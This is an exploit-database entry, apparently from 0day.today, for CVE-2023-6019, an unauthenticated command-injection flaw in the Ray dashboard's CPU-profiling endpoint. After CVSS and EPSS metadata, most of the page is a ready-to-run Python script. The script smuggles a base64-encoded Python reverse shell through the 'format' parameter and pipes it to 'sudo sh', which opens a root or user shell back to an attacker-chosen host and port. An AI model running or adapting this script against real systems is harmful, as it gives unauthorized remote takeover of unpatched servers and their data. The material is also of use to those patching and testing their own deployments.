Ray OS v2.6.3 - Command Injection Exploit

2024-04-1200:00:00

Fire_Wolf

0day.today

ray os

command injection

rce

unauthorized

cpu profiling

system command

passwordless sudo

ray project

cve-2023-6019

ubuntu 20.04.6 lts

github

command execution

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.4 High

AI Score

Confidence

Low

0.804 High

EPSS

Percentile

98.3%

JSON

# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
#  The Ray Project dashboard contains a CPU profiling page, and the format parameter is
#  not validated before being inserted into a system command executed in a shell, allowing
#  for arbitrary command execution. If the system is configured to allow passwordless sudo
#  (a setup some Ray configurations require) this will result in a root shell being returned
#  to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================

# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3

proxies = {"http": "127.0.0.1:8080"}
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
}


def check_url(target, port):
    target_url = target + ":" + port
    https = 0
    if 'http' not in target:
        try:
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            test_url = 'http://' + target_url
            response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
            if response.status_code != 200:
                is_https = 0
                return is_https
        except Exception as e:
            print("ERROR! The Exception is:" + format(e))
    if https == 1:
        return "https://" + target_url
    else:
        return "http://" + target_url


def exp(target,ip,lhost, lport):
    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
    print("[*]Payload is: " + payload)
    b64_payload = base64.b64encode(payload.encode())
    print("[*]Base64 encoding payload is: " + b64_payload.decode())
    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'
    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
    print(exp_url)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    response = requests.get(url=exp_url, headers=headers, verify=False)
    if response.status_code == 200:
        print("[-]ERROR: Exploit Failed,please check the payload.")
    else:
        print("[+]Exploit is finished,please check your machine!")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='''
         ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
        ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄
        ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃
        
        
        
                            ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄
                            ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄
        ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
        ''',
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')
    parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')
    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
    parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
    args = parser.parse_args()
    # target = args.target
    ip = args.target
    # port = args.port
    # lhost = args.lhost
    # lport = args.lport
    targeturl = check_url(args.target, args.port)
    print(targeturl)
    print("[*] Checking in url: " + targeturl)
    exp(targeturl, ip, args.lhost, args.lport)